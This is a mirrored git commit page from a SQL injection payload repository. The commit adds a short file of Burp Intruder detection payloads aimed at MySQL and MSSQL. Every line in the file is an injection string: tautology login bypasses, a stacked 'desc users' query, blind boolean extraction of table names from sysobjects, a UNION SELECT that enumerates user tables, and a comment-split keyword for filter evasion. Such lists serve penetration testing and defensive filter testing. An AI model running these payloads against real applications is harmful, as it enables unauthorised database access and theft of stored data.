mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
10
Intruder/detect/MySQL/MySQL_MSSQL.txt
Normal file
10
Intruder/detect/MySQL/MySQL_MSSQL.txt
Normal file
@@ -0,0 +1,10 @@
|
||||
1
|
||||
1 and user_name() = 'dbo'
|
||||
\'; desc users; --
|
||||
1\'1
|
||||
1' and non_existant_table = '1
|
||||
' or username is not NULL or username = '
|
||||
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
|
||||
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
|
||||
1 uni/**/on select all from where
|
||||
|
||||
Reference in New Issue
Block a user